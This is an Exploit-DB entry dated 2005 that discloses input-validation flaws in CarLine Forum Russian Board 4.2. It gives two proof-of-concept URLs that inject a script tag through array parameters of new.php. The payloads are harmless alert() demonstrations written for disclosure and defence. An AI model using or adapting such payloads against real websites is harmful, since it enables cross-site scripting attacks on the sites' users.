CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS

2005-06-23T00:00:00
ID EDB-ID:25884
Type exploitdb
Reporter 1dt.w0lf
Modified 2005-06-23T00:00:00

Description

CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14045/info
       
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
       
Forum Russian Board 4.2 is reported to be affected. 

new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>